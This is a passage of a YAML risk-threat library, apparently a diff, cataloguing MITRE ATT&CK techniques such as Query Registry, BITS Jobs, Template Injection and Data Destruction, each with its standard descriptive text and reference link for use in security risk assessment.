Synful Knock + Evolution) Because ICMP is part of the Internet Protocol Suite, it is required + to be implemented by all IP-compatible hosts.(Citation: Microsoft ICMP) However, + it is not as commonly monitored as other Internet Protocols such as TCP or UDP + and may be used by adversaries to hide communications. + + https://attack.mitre.org/techniques/T1095' + version: '1.0' + - urn: urn:intuitem:risk:threat:mitre-attack:T1012 + name: T1012 - Query Registry + provider: MITRE ATT&CK + description: 'Adversaries may interact with the Windows Registry to gather information + about the system, configuration, and installed software. + + + The Registry contains a significant amount of information about the operating + system, configuration, software, and security.(Citation: Wikipedia Windows Registry) + Information can easily be queried using the [Reg](https://attack.mitre.org/software/S0075) + utility, though other means to access the Registry exist. Some of the information + may help adversaries to further their operation within a network. Adversaries + may use the information from [Query Registry](https://attack.mitre.org/techniques/T1012) + during automated discovery to shape follow-on behaviors, including whether or + not the adversary fully infects the target and/or attempts specific actions. + + https://attack.mitre.org/techniques/T1012' + version: '1.0' + - urn: urn:intuitem:risk:threat:mitre-attack:T1030 + name: T1030 - Data Transfer Size Limits + provider: MITRE ATT&CK + description: 'An adversary may exfiltrate data in fixed size chunks instead of + whole files or limit packet sizes below certain thresholds. This approach may + be used to avoid triggering network data transfer threshold alerts. + + https://attack.mitre.org/techniques/T1030' + version: '1.0' + - urn: urn:intuitem:risk:threat:mitre-attack:T1499 + name: T1499 - Endpoint Denial of Service + provider: MITRE ATT&CK + description: 'Adversaries may perform Endpoint Denial of Service (DoS) attacks + to degrade or block the availability of services to users. Endpoint DoS can + be performed by exhausting the system resources those services are hosted on + or exploiting the system to cause a persistent crash condition. Example services + include websites, email services, DNS, and web-based applications. Adversaries + have been observed conducting DoS attacks for political purposes(Citation: FireEye + OpPoisonedHandover February 2016) and to support other malicious activities, + including distraction(Citation: FSISAC FraudNetDoS September 2012), hacktivism, + and extortion.(Citation: Symantec DDoS October 2014) + + + An Endpoint DoS denies the availability of a service without saturating the + network used to provide access to the service. Adversaries can target various + layers of the application stack that is hosted on the system used to provide + the service. These layers include the Operating Systems (OS), server applications + such as web servers, DNS servers, databases, and the (typically web-based) applications + that sit on top of them. Attacking each layer requires different techniques + that take advantage of bottlenecks that are unique to the respective components. + A DoS attack may be generated by a single system or multiple systems spread + across the internet, which is commonly referred to as a distributed DoS (DDoS). + + + To perform DoS attacks against endpoint resources, several aspects apply to + multiple methods, including IP address spoofing and botnets. + + + Adversaries may use the original IP address of an attacking system, or spoof + the source IP address to make the attack traffic more difficult to trace back + to the attacking system or to enable reflection. This can increase the difficulty + defenders have in defending against the attack by reducing or eliminating the + effectiveness of filtering by the source address on network defense devices. + + + Botnets are commonly used to conduct DDoS attacks against networks and services. + Large botnets can generate a significant amount of traffic from systems spread + across the global internet. Adversaries may have the resources to build out + and control their own botnet infrastructure or may rent time on an existing + botnet to conduct an attack. In some of the worst cases for DDoS, so many systems + are used to generate requests that each one only needs to send out a small amount + of traffic to produce enough volume to exhaust the target''s resources. In such + circumstances, distinguishing DDoS traffic from legitimate clients becomes exceedingly + difficult. Botnets have been used in some of the most high-profile DDoS attacks, + such as the 2012 series of incidents that targeted major US banks.(Citation: + USNYAG IranianBotnet March 2016) + + + In cases where traffic manipulation is used, there may be points in the global + network (such as high traffic gateway routers) where packets can be altered + and cause legitimate clients to execute code that directs network packets toward + a target in high volume. This type of capability was previously used for the + purposes of web censorship where client HTTP traffic was modified to include + a reference to JavaScript that generated the DDoS code to overwhelm target web + servers.(Citation: ArsTechnica Great Firewall of China) + + + For attacks attempting to saturate the providing network, see [Network Denial + of Service](https://attack.mitre.org/techniques/T1498). + + https://attack.mitre.org/techniques/T1499' + version: '1.0' + - urn: urn:intuitem:risk:threat:mitre-attack:T1614 + name: T1614 - System Location Discovery + provider: MITRE ATT&CK + description: 'Adversaries may gather information in an attempt to calculate the + geographical location of a victim host. Adversaries may use the information + from [System Location Discovery](https://attack.mitre.org/techniques/T1614) + during automated discovery to shape follow-on behaviors, including whether or + not the adversary fully infects the target and/or attempts specific actions. + + + Adversaries may attempt to infer the location of a system using various system + checks, such as time zone, keyboard layout, and/or language settings.(Citation: + FBI Ragnar Locker 2020)(Citation: Sophos Geolocation 2016)(Citation: Bleepingcomputer + RAT malware 2020) Windows API functions such as GetLocaleInfoW + can also be used to determine the locale of the host.(Citation: FBI Ragnar Locker + 2020) In cloud environments, an instance''s availability zone may also be discovered + by accessing the instance metadata service from the instance.(Citation: AWS + Instance Identity Documents)(Citation: Microsoft Azure Instance Metadata 2021) + + + Adversaries may also attempt to infer the location of a victim host using IP + addressing, such as via online geolocation IP-lookup services.(Citation: Securelist + Trasparent Tribe 2020)(Citation: Sophos Geolocation 2016) + + https://attack.mitre.org/techniques/T1614' + version: '1.0' + - urn: urn:intuitem:risk:threat:mitre-attack:T1197 + name: T1197 - BITS Jobs + provider: MITRE ATT&CK + description: 'Adversaries may abuse BITS jobs to persistently execute code and + perform various background tasks. Windows Background Intelligent Transfer Service + (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through + [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM).(Citation: + Microsoft COM)(Citation: Microsoft BITS) BITS is commonly used by updaters, + messengers, and other applications preferred to operate in the background (using + available idle bandwidth) without interrupting other networked applications. + File transfer tasks are implemented as BITS jobs, which contain a queue of one + or more file operations. + + + The interface to create and manage BITS jobs is accessible through [PowerShell](https://attack.mitre.org/techniques/T1059/001) + and the [BITSAdmin](https://attack.mitre.org/software/S0190) tool.(Citation: + Microsoft BITS)(Citation: Microsoft BITSAdmin) + + + Adversaries may abuse BITS to download (e.g. [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105)), + execute, and even clean up after running malicious code (e.g. [Indicator Removal](https://attack.mitre.org/techniques/T1070)). + BITS tasks are self-contained in the BITS job database, without new files or + registry modifications, and often permitted by host firewalls.(Citation: CTU + BITS Malware June 2016)(Citation: Mondok Windows PiggyBack BITS May 2007)(Citation: + Symantec BITS May 2007) BITS enabled execution may also enable persistence by + creating long-standing jobs (the default maximum lifetime is 90 days and extendable) + or invoking an arbitrary program when a job completes or errors (including after + system reboots).(Citation: PaloAlto UBoatRAT Nov 2017)(Citation: CTU BITS Malware + June 2016) + + + BITS upload functionalities can also be used to perform [Exfiltration Over Alternative + Protocol](https://attack.mitre.org/techniques/T1048).(Citation: CTU BITS Malware + June 2016) + + https://attack.mitre.org/techniques/T1197' + version: '1.0' + - urn: urn:intuitem:risk:threat:mitre-attack:T1656 + name: T1656 - Impersonation + provider: MITRE ATT&CK + description: "Adversaries may impersonate a trusted person or organization in\ + \ order to persuade and trick a target into performing some action on their\ + \ behalf. For example, adversaries may communicate with victims (via [Phishing\ + \ for Information](https://attack.mitre.org/techniques/T1598), [Phishing](https://attack.mitre.org/techniques/T1566),\ + \ or [Internal Spearphishing](https://attack.mitre.org/techniques/T1534)) while\ + \ impersonating a known sender such as an executive, colleague, or third-party\ + \ vendor. Established trust can then be leveraged to accomplish an adversary\u2019\ + s ultimate goals, possibly against multiple victims. \n \nIn many cases of business\ + \ email compromise or email fraud campaigns, adversaries use impersonation to\ + \ defraud victims -- deceiving them into sending money or divulging information\ + \ that ultimately enables [Financial Theft](https://attack.mitre.org/techniques/T1657).\n\ + \nAdversaries will often also use social engineering techniques such as manipulative\ + \ and persuasive language in email subject lines and body text such as `payment`,\ + \ `request`, or `urgent` to push the victim to act quickly before malicious\ + \ activity is detected. These campaigns are often specifically targeted against\ + \ people who, due to job roles and/or accesses, can carry out the adversary\u2019\ + s goal.\u202F\u202F \n \nImpersonation is typically preceded by reconnaissance\ + \ techniques such as [Gather Victim Identity Information](https://attack.mitre.org/techniques/T1589)\ + \ and [Gather Victim Org Information](https://attack.mitre.org/techniques/T1591)\ + \ as well as acquiring infrastructure such as email domains (i.e. [Domains](https://attack.mitre.org/techniques/T1583/001))\ + \ to substantiate their false identity.(Citation: CrowdStrike-BEC)\n \nThere\ + \ is the potential for multiple victims in campaigns involving impersonation.\ + \ For example, an adversary may [Compromise Accounts](https://attack.mitre.org/techniques/T1586)\ + \ targeting one organization which can then be used to support impersonation\ + \ against other entities.(Citation: VEC)\nhttps://attack.mitre.org/techniques/T1656" + version: '1.0' + - urn: urn:intuitem:risk:threat:mitre-attack:T1132 + name: T1132 - Data Encoding + provider: MITRE ATT&CK + description: 'Adversaries may encode data to make the content of command and control + traffic more difficult to detect. Command and control (C2) information can be + encoded using a standard data encoding system. Use of data encoding may adhere + to existing protocol specifications and includes use of ASCII, Unicode, Base64, + MIME, or other binary-to-text and character encoding systems.(Citation: Wikipedia + Binary-to-text Encoding) (Citation: Wikipedia Character Encoding) Some data + encoding systems may also result in data compression, such as gzip. + + https://attack.mitre.org/techniques/T1132' + version: '1.0' + - urn: urn:intuitem:risk:threat:mitre-attack:T1598 + name: T1598 - Phishing for Information + provider: MITRE ATT&CK + description: "Adversaries may send phishing messages to elicit sensitive information\ + \ that can be used during targeting. Phishing for information is an attempt\ + \ to trick targets into divulging information, frequently credentials or other\ + \ actionable information. Phishing for information is different from [Phishing](https://attack.mitre.org/techniques/T1566)\ + \ in that the objective is gathering data from the victim rather than executing\ + \ malicious code.\n\nAll forms of phishing are electronically delivered social\ + \ engineering. Phishing can be targeted, known as spearphishing. In spearphishing,\ + \ a specific individual, company, or industry will be targeted by the adversary.\ + \ More generally, adversaries can conduct non-targeted phishing, such as in\ + \ mass credential harvesting campaigns.\n\nAdversaries may also try to obtain\ + \ information directly through the exchange of emails, instant messages, or\ + \ other electronic conversation means.(Citation: ThreatPost Social Media Phishing)(Citation:\ + \ TrendMictro Phishing)(Citation: PCMag FakeLogin)(Citation: Sophos Attachment)(Citation:\ + \ GitHub Phishery) Victims may also receive phishing messages that direct them\ + \ to call a phone number where the adversary attempts to collect confidential\ + \ information.(Citation: Avertium callback phishing)\n\nPhishing for information\ + \ frequently involves social engineering techniques, such as posing as a source\ + \ with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585)\ + \ or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or\ + \ sending multiple, seemingly urgent messages. Another way to accomplish this\ + \ is by forging or spoofing(Citation: Proofpoint-spoof) the identity of the\ + \ sender which can be used to fool both the human recipient as well as automated\ + \ security tools.(Citation: cyberproof-double-bounce) \n\nPhishing for information\ + \ may also involve evasive techniques, such as removing or manipulating emails\ + \ or metadata/headers from compromised accounts being abused to send messages\ + \ (e.g., [Email Hiding Rules](https://attack.mitre.org/techniques/T1564/008)).(Citation:\ + \ Microsoft OAuth Spam 2022)(Citation: Palo Alto Unit 42 VBA Infostealer 2014)\n\ + https://attack.mitre.org/techniques/T1598" + version: '1.0' + - urn: urn:intuitem:risk:threat:mitre-attack:T1496 + name: T1496 - Resource Hijacking + provider: MITRE ATT&CK + description: "Adversaries may leverage the resources of co-opted systems to complete\ + \ resource-intensive tasks, which may impact system and/or hosted service availability.\ + \ \n\nOne common purpose for Resource Hijacking is to validate transactions\ + \ of cryptocurrency networks and earn virtual currency. Adversaries may consume\ + \ enough system resources to negatively impact and/or cause affected machines\ + \ to become unresponsive.(Citation: Kaspersky Lazarus Under The Hood Blog 2017)\ + \ Servers and cloud-based systems are common targets because of the high potential\ + \ for available resources, but user endpoint systems may also be compromised\ + \ and used for Resource Hijacking and cryptocurrency mining.(Citation: CloudSploit\ + \ - Unused AWS Regions) Containerized environments may also be targeted due\ + \ to the ease of deployment via exposed APIs and the potential for scaling mining\ + \ activities by deploying or compromising multiple containers within an environment\ + \ or cluster.(Citation: Unit 42 Hildegard Malware)(Citation: Trend Micro Exposed\ + \ Docker APIs)\n\nAdditionally, some cryptocurrency mining malware identify\ + \ then kill off processes for competing malware to ensure it\u2019s not competing\ + \ for resources.(Citation: Trend Micro War of Crypto Miners)\n\nAdversaries\ + \ may also use malware that leverages a system's network bandwidth as part of\ + \ a botnet in order to facilitate [Network Denial of Service](https://attack.mitre.org/techniques/T1498)\ + \ campaigns and/or to seed malicious torrents.(Citation: GoBotKR) Alternatively,\ + \ they may engage in proxyjacking by selling use of the victims' network bandwidth\ + \ and IP address to proxyware services.(Citation: Sysdig Proxyjacking)\nhttps://attack.mitre.org/techniques/T1496" + version: '1.0' + - urn: urn:intuitem:risk:threat:mitre-attack:T1585 + name: T1585 - Establish Accounts + provider: MITRE ATT&CK + description: 'Adversaries may create and cultivate accounts with services that + can be used during targeting. Adversaries can create accounts that can be used + to build a persona to further operations. Persona development consists of the + development of public information, presence, history and appropriate affiliations. + This development could be applied to social media, website, or other publicly + available information that could be referenced and scrutinized for legitimacy + over the course of an operation using that persona or identity.(Citation: NEWSCASTER2014)(Citation: + BlackHatRobinSage) + + + For operations incorporating social engineering, the utilization of an online + persona may be important. These personas may be fictitious or impersonate real + people. The persona may exist on a single site or across multiple sites (ex: + Facebook, LinkedIn, Twitter, Google, GitHub, Docker Hub, etc.). Establishing + a persona may require development of additional documentation to make them seem + real. This could include filling out profile information, developing social + networks, or incorporating photos.(Citation: NEWSCASTER2014)(Citation: BlackHatRobinSage) + + + Establishing accounts can also include the creation of accounts with email providers, + which may be directly leveraged for [Phishing for Information](https://attack.mitre.org/techniques/T1598) + or [Phishing](https://attack.mitre.org/techniques/T1566).(Citation: Mandiant + APT1) + + https://attack.mitre.org/techniques/T1585' + version: '1.0' + - urn: urn:intuitem:risk:threat:mitre-attack:T1588 + name: T1588 - Obtain Capabilities + provider: MITRE ATT&CK + description: 'Adversaries may buy and/or steal capabilities that can be used during + targeting. Rather than developing their own capabilities in-house, adversaries + may purchase, freely download, or steal them. Activities may include the acquisition + of malware, software (including licenses), exploits, certificates, and information + relating to vulnerabilities. Adversaries may obtain capabilities to support + their operations throughout numerous phases of the adversary lifecycle. + + + In addition to downloading free malware, software, and exploits from the internet, + adversaries may purchase these capabilities from third-party entities. Third-party + entities can include technology companies that specialize in malware and exploits, + criminal marketplaces, or from individuals.(Citation: NationsBuying)(Citation: + PegasusCitizenLab) + + + In addition to purchasing capabilities, adversaries may steal capabilities from + third-party entities (including other adversaries). This can include stealing + software licenses, malware, SSL/TLS and code-signing certificates, or raiding + closed databases of vulnerabilities or exploits.(Citation: DiginotarCompromise) + + https://attack.mitre.org/techniques/T1588' + version: '1.0' + - urn: urn:intuitem:risk:threat:mitre-attack:T1569 + name: T1569 - System Services + provider: MITRE ATT&CK + description: 'Adversaries may abuse system services or daemons to execute commands + or programs. Adversaries can execute malicious content by interacting with or + creating services either locally or remotely. Many services are set to run at + boot, which can aid in achieving persistence ([Create or Modify System Process](https://attack.mitre.org/techniques/T1543)), + but adversaries can also abuse services for one-time or temporary execution. + + https://attack.mitre.org/techniques/T1569' + version: '1.0' + - urn: urn:intuitem:risk:threat:mitre-attack:T1650 + name: T1650 - Acquire Access + provider: MITRE ATT&CK + description: "Adversaries may purchase or otherwise acquire an existing access\ + \ to a target system or network. A variety of online services and initial access\ + \ broker networks are available to sell access to previously compromised systems.(Citation:\ + \ Microsoft Ransomware as a Service)(Citation: CrowdStrike Access Brokers)(Citation:\ + \ Krebs Access Brokers Fortune 500) In some cases, adversary groups may form\ + \ partnerships to share compromised systems with each other.(Citation: CISA\ + \ Karakurt 2022)\n\nFootholds to compromised systems may take a variety of forms,\ + \ such as access to planted backdoors (e.g., [Web Shell](https://attack.mitre.org/techniques/T1505/003))\ + \ or established access via [External Remote Services](https://attack.mitre.org/techniques/T1133).\ + \ In some cases, access brokers will implant compromised systems with a \u201C\ + load\u201D that can be used to install additional malware for paying customers.(Citation:\ + \ Microsoft Ransomware as a Service)\n\nBy leveraging existing access broker\ + \ networks rather than developing or obtaining their own initial access capabilities,\ + \ an adversary can potentially reduce the resources required to gain a foothold\ + \ on a target network and focus their efforts on later stages of compromise.\ + \ Adversaries may prioritize acquiring access to systems that have been determined\ + \ to lack security monitoring or that have high privileges, or systems that\ + \ belong to organizations in a particular sector.(Citation: Microsoft Ransomware\ + \ as a Service)(Citation: CrowdStrike Access Brokers)\n\nIn some cases, purchasing\ + \ access to an organization in sectors such as IT contracting, software development,\ + \ or telecommunications may allow an adversary to compromise additional victims\ + \ via a [Trusted Relationship](https://attack.mitre.org/techniques/T1199), [Multi-Factor\ + \ Authentication Interception](https://attack.mitre.org/techniques/T1111), or\ + \ even [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195).\n\ + \n**Note:** while this technique is distinct from other behaviors such as [Purchase\ + \ Technical Data](https://attack.mitre.org/techniques/T1597/002) and [Credentials](https://attack.mitre.org/techniques/T1589/001),\ + \ they may often be used in conjunction (especially where the acquired foothold\ + \ requires [Valid Accounts](https://attack.mitre.org/techniques/T1078)).\nhttps://attack.mitre.org/techniques/T1650" + version: '1.0' + - urn: urn:intuitem:risk:threat:mitre-attack:T1213 + name: T1213 - Data from Information Repositories + provider: MITRE ATT&CK + description: "Adversaries may leverage information repositories to mine valuable\ + \ information. Information repositories are tools that allow for storage of\ + \ information, typically to facilitate collaboration or information sharing\ + \ between users, and can store a wide variety of data that may aid adversaries\ + \ in further objectives, or direct access to the target information. Adversaries\ + \ may also abuse external sharing features to share sensitive documents with\ + \ recipients outside of the organization. \n\nThe following is a brief list\ + \ of example information that may hold potential value to an adversary and may\ + \ also be found on an information repository:\n\n* Policies, procedures, and\ + \ standards\n* Physical / logical network diagrams\n* System architecture diagrams\n\ + * Technical system documentation\n* Testing / development credentials\n* Work\ + \ / project schedules\n* Source code snippets\n* Links to network shares and\ + \ other internal resources\n\nInformation stored in a repository may vary based\ + \ on the specific instance or environment. Specific common information repositories\ + \ include web-based platforms such as [Sharepoint](https://attack.mitre.org/techniques/T1213/002)\ + \ and [Confluence](https://attack.mitre.org/techniques/T1213/001), specific\ + \ services such as Code Repositories, IaaS databases, enterprise databases,\ + \ and other storage infrastructure such as SQL Server.\nhttps://attack.mitre.org/techniques/T1213" + version: '1.0' + - urn: urn:intuitem:risk:threat:mitre-attack:T1200 + name: T1200 - Hardware Additions + provider: MITRE ATT&CK + description: 'Adversaries may introduce computer accessories, networking hardware, + or other computing devices into a system or network that can be used as a vector + to gain access. Rather than just connecting and distributing payloads via removable + storage (i.e. [Replication Through Removable Media](https://attack.mitre.org/techniques/T1091)), + more robust hardware additions can be used to introduce new functionalities + and/or features into a system that can then be abused. + + + While public references of usage by threat actors are scarce, many red teams/penetration + testers leverage hardware additions for initial access. Commercial and open + source products can be leveraged with capabilities such as passive network tapping, + network traffic modification (i.e. [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557)), + keystroke injection, kernel memory reading via DMA, addition of new wireless + access to an existing network, and others.(Citation: Ossmann Star Feb 2011)(Citation: + Aleks Weapons Nov 2015)(Citation: Frisk DMA August 2016)(Citation: McMillan + Pwn March 2012) + + https://attack.mitre.org/techniques/T1200' + version: '1.0' + - urn: urn:intuitem:risk:threat:mitre-attack:T1505 + name: T1505 - Server Software Component + provider: MITRE ATT&CK + description: 'Adversaries may abuse legitimate extensible development features + of servers to establish persistent access to systems. Enterprise server applications + may include features that allow developers to write and install software or + scripts to extend the functionality of the main application. Adversaries may + install malicious components to extend and abuse server applications.(Citation: + volexity_0day_sophos_FW) + + https://attack.mitre.org/techniques/T1505' + version: '1.0' + - urn: urn:intuitem:risk:threat:mitre-attack:T1485 + name: T1485 - Data Destruction + provider: MITRE ATT&CK + description: 'Adversaries may destroy data and files on specific systems or in + large numbers on a network to interrupt availability to systems, services, and + network resources. Data destruction is likely to render stored data irrecoverable + by forensic techniques through overwriting files or data on local and remote + drives.(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: + Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)(Citation: Unit + 42 Shamoon3 2018)(Citation: Talos Olympic Destroyer 2018) Common operating system + file deletion commands such as del and rm often only + remove pointers to files without wiping the contents of the files themselves, + making the files recoverable by proper forensic methodology. This behavior is + distinct from [Disk Content Wipe](https://attack.mitre.org/techniques/T1561/001) + and [Disk Structure Wipe](https://attack.mitre.org/techniques/T1561/002) because + individual files are destroyed rather than sections of a storage disk or the + disk''s logical structure. + + + Adversaries may attempt to overwrite files and directories with randomly generated + data to make it irrecoverable.(Citation: Kaspersky StoneDrill 2017)(Citation: + Unit 42 Shamoon3 2018) In some cases politically oriented image files have been + used to overwrite data.(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto + Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017) + + + To maximize impact on the target organization in operations where network-wide + availability interruption is the goal, malware designed for destroying data + may have worm-like features to propagate across a network by leveraging additional + techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), + [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), and [SMB/Windows + Admin Shares](https://attack.mitre.org/techniques/T1021/002).(Citation: Symantec + Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon + Nov 2016)(Citation: Kaspersky StoneDrill 2017)(Citation: Talos Olympic Destroyer + 2018). + + + In cloud environments, adversaries may leverage access to delete cloud storage, + cloud storage accounts, machine images, and other infrastructure crucial to + operations to damage an organization or their customers.(Citation: Data Destruction + - Threat Post)(Citation: DOJ - Cisco Insider) + + https://attack.mitre.org/techniques/T1485' + version: '1.0' + - urn: urn:intuitem:risk:threat:mitre-attack:T1537 + name: T1537 - Transfer Data to Cloud Account + provider: MITRE ATT&CK + description: 'Adversaries may exfiltrate data by transferring the data, including + backups of cloud environments, to another cloud account they control on the + same service to avoid typical file transfers/downloads and network-based exfiltration + detection. + + + A defender who is monitoring for large transfers to outside the cloud environment + through normal file transfers or over command and control channels may not be + watching for data transfers to another account within the same cloud provider. + Such transfers may utilize existing cloud provider APIs and the internal address + space of the cloud provider to blend into normal traffic or avoid data transfers + over external network interfaces. + + + Incidents have been observed where adversaries have created backups of cloud + instances and transferred them to separate accounts.(Citation: DOJ GRU Indictment + Jul 2018) + + https://attack.mitre.org/techniques/T1537' + version: '1.0' + - urn: urn:intuitem:risk:threat:mitre-attack:T1189 + name: T1189 - Drive-by Compromise + provider: MITRE ATT&CK + description: "Adversaries may gain access to a system through a user visiting\ + \ a website over the normal course of browsing. With this technique, the user's\ + \ web browser is typically targeted for exploitation, but adversaries may also\ + \ use compromised websites for non-exploitation behavior such as acquiring [Application\ + \ Access Token](https://attack.mitre.org/techniques/T1550/001).\n\nMultiple\ + \ ways of delivering exploit code to a browser exist (i.e., [Drive-by Target](https://attack.mitre.org/techniques/T1608/004)),\ + \ including:\n\n* A legitimate website is compromised where adversaries have\ + \ injected some form of malicious code such as JavaScript, iFrames, and cross-site\ + \ scripting\n* Script files served to a legitimate website from a publicly writeable\ + \ cloud storage bucket are modified by an adversary\n* Malicious ads are paid\ + \ for and served through legitimate ad providers (i.e., [Malvertising](https://attack.mitre.org/techniques/T1583/008))\n\ + * Built-in web application interfaces are leveraged for the insertion of any\ + \ other kind of object that can be used to display web content or contain a\ + \ script that executes on the visiting client (e.g. forum posts, comments, and\ + \ other user controllable web content).\n\nOften the website used by an adversary\ + \ is one visited by a specific community, such as government, a particular industry,\ + \ or region, where the goal is to compromise a specific user or set of users\ + \ based on a shared interest. This kind of targeted campaign is often referred\ + \ to a strategic web compromise or watering hole attack. There are several known\ + \ examples of this occurring.(Citation: Shadowserver Strategic Web Compromise)\n\ + \nTypical drive-by compromise process:\n\n1. A user visits a website that is\ + \ used to host the adversary controlled content.\n2. Scripts automatically execute,\ + \ typically searching versions of the browser and plugins for a potentially\ + \ vulnerable version. \n * The user may be required to assist in this process\ + \ by enabling scripting or active website components and ignoring warning dialog\ + \ boxes.\n3. Upon finding a vulnerable version, exploit code is delivered to\ + \ the browser.\n4. If exploitation is successful, then it will give the adversary\ + \ code execution on the user's system unless other protections are in place.\n\ + \ * In some cases a second visit to the website after the initial scan is\ + \ required before exploit code is delivered.\n\nUnlike [Exploit Public-Facing\ + \ Application](https://attack.mitre.org/techniques/T1190), the focus of this\ + \ technique is to exploit software on a client endpoint upon visiting a website.\ + \ This will commonly give an adversary access to systems on the internal network\ + \ instead of external systems that may be in a DMZ.\n\nAdversaries may also\ + \ use compromised websites to deliver a user to a malicious application designed\ + \ to [Steal Application Access Token](https://attack.mitre.org/techniques/T1528)s,\ + \ like OAuth tokens, to gain access to protected applications and information.\ + \ These malicious applications have been delivered through popups on legitimate\ + \ websites.(Citation: Volexity OceanLotus Nov 2017)\nhttps://attack.mitre.org/techniques/T1189" + version: '1.0' + - urn: urn:intuitem:risk:threat:mitre-attack:T1498 + name: T1498 - Network Denial of Service + provider: MITRE ATT&CK + description: 'Adversaries may perform Network Denial of Service (DoS) attacks + to degrade or block the availability of targeted resources to users. Network + DoS can be performed by exhausting the network bandwidth services rely on. Example + resources include specific websites, email services, DNS, and web-based applications. + Adversaries have been observed conducting network DoS attacks for political + purposes(Citation: FireEye OpPoisonedHandover February 2016) and to support + other malicious activities, including distraction(Citation: FSISAC FraudNetDoS + September 2012), hacktivism, and extortion.(Citation: Symantec DDoS October + 2014) + + + A Network DoS will occur when the bandwidth capacity of the network connection + to a system is exhausted due to the volume of malicious traffic directed at + the resource or the network connections and network devices the resource relies + on. For example, an adversary may send 10Gbps of traffic to a server that is + hosted by a network with a 1Gbps connection to the internet. This traffic can + be generated by a single system or multiple systems spread across the internet, + which is commonly referred to as a distributed DoS (DDoS). + + + To perform Network DoS attacks several aspects apply to multiple methods, including + IP address spoofing, and botnets. + + + Adversaries may use the original IP address of an attacking system, or spoof + the source IP address to make the attack traffic more difficult to trace back + to the attacking system or to enable reflection. This can increase the difficulty + defenders have in defending against the attack by reducing or eliminating the + effectiveness of filtering by the source address on network defense devices. + + + For DoS attacks targeting the hosting system directly, see [Endpoint Denial + of Service](https://attack.mitre.org/techniques/T1499). + + https://attack.mitre.org/techniques/T1498' + version: '1.0' + - urn: urn:intuitem:risk:threat:mitre-attack:T1651 + name: T1651 - Cloud Administration Command + provider: MITRE ATT&CK + description: "Adversaries may abuse cloud management services to execute commands\ + \ within virtual machines or hybrid-joined devices. Resources such as AWS Systems\ + \ Manager, Azure RunCommand, and Runbooks allow users to remotely run scripts\ + \ in virtual machines by leveraging installed virtual machine agents. Similarly,\ + \ in Azure AD environments, Microsoft Endpoint Manager allows Global or Intune\ + \ Administrators to run scripts as SYSTEM on on-premises devices joined to the\ + \ Azure AD.(Citation: AWS Systems Manager Run Command)(Citation: Microsoft Run\ + \ Command)(Citation: SpecterOps Lateral Movement from Azure to On-Prem AD 2020)\n\ + \nIf an adversary gains administrative access to a cloud environment, they may\ + \ be able to abuse cloud management services to execute commands in the environment\u2019\ + s virtual machines or on-premises hybrid-joined devices. Additionally, an adversary\ + \ that compromises a service provider or delegated administrator account may\ + \ similarly be able to leverage a [Trusted Relationship](https://attack.mitre.org/techniques/T1199)\ + \ to execute commands in connected virtual machines.(Citation: MSTIC Nobelium\ + \ Oct 2021)\nhttps://attack.mitre.org/techniques/T1651" + version: '1.0' + - urn: urn:intuitem:risk:threat:mitre-attack:T1221 + name: T1221 - Template Injection + provider: MITRE ATT&CK + description: "Adversaries may create or modify references in user document templates\ + \ to conceal malicious code or force authentication attempts. For example, Microsoft\u2019\ + s Office Open XML (OOXML) specification defines an XML-based format for Office\ + \ documents (.docx, xlsx, .pptx) to replace older binary formats (.doc, .xls,\ + \ .ppt). OOXML files are packed together ZIP archives compromised of various\ + \ XML files, referred to as parts, containing properties that collectively define\ + \ how a document is rendered.(Citation: Microsoft Open XML July 2017)\n\nProperties\ + \ within parts may reference shared public resources accessed via online URLs.\ + \ For example, template properties may reference a file, serving as a pre-formatted\ + \ document blueprint, that is fetched when the document is loaded.\n\nAdversaries\ + \ may abuse these templates to initially conceal malicious code to be executed\ + \ via user documents. Template references injected into a document may enable\ + \ malicious payloads to be fetched and executed when the document is loaded.(Citation:\ + \ SANS Brian Wiltse Template Injection) These documents can be delivered via\ + \ other techniques such as [Phishing](https://attack.mitre.org/techniques/T1566)\ + \ and/or [Taint Shared Content](https://attack.mitre.org/techniques/T1080) and\ + \ may evade static detections since no typical indicators (VBA macro, script,\ + \ etc.) are present until after the malicious payload is fetched.(Citation:\ + \ Redxorblue Remote Template Injection) Examples have been seen in the wild\ + \ where template injection was used to load malicious code containing an exploit.(Citation:\ + \ MalwareBytes Template Injection OCT 2017)\n\nAdversaries may also modify the\ + \ *\\template control word within an .rtf file to similarly conceal\ + \ then download malicious code. This legitimate control word value is intended\ + \ to be a file destination of a template file resource that is retrieved and\ + \ loaded when an .rtf file is opened. However, adversaries may alter the bytes\ + \ of an existing .rtf file to insert a template control word field to include\ + \ a URL resource of a malicious payload.(Citation: Proofpoint RTF Injection)(Citation:\ + \ Ciberseguridad Decoding malicious RTF files)\n\nThis technique may also enable\ + \ [Forced Authentication](https://attack.mitre.org/techniques/T1187) by injecting\ + \ a SMB/HTTPS (or other credential prompting) URL and triggering an authentication\ + \ attempt.(Citation: Anomali Template Injection MAR 2018)(Citation: Talos Template\ + \ Injection July 2017)(Citation: ryhanson phishery SEPT 2016)\nhttps://attack.mitre.org/techniques/T1221" + version: '1.0' + - urn: urn:intuitem:risk:threat:mitre-attack:T1134 + name: T1134 - Access Token Manipulation + provider: MITRE ATT&CK + description: 'Adversaries may modify access tokens to operate under a different + user or system security context to perform actions and bypass access controls. + Windows uses access tokens to determine the ownership of a running process. + A user can manipulate access tokens to make a running process appear as though + it is the child of a different process or belongs to someone other than the + user that started the process. When this occurs, the process also takes on the + security context associated with the new token. + + + An adversary can use built-in Windows API functions to copy access tokens from + existing processes; this is known as token stealing. These token can then be + applied to an existing process (i.e. [Token Impersonation/Theft](https://attack.mitre.org/techniques/T1134/001)) + or used to spawn a new process (i.e. [Create Process with Token](https://attack.mitre.org/techniques/T1134/002)). + An adversary must already be in a privileged user context (i.e. administrator) + to steal a token. However, adversaries commonly use token stealing to elevate + their 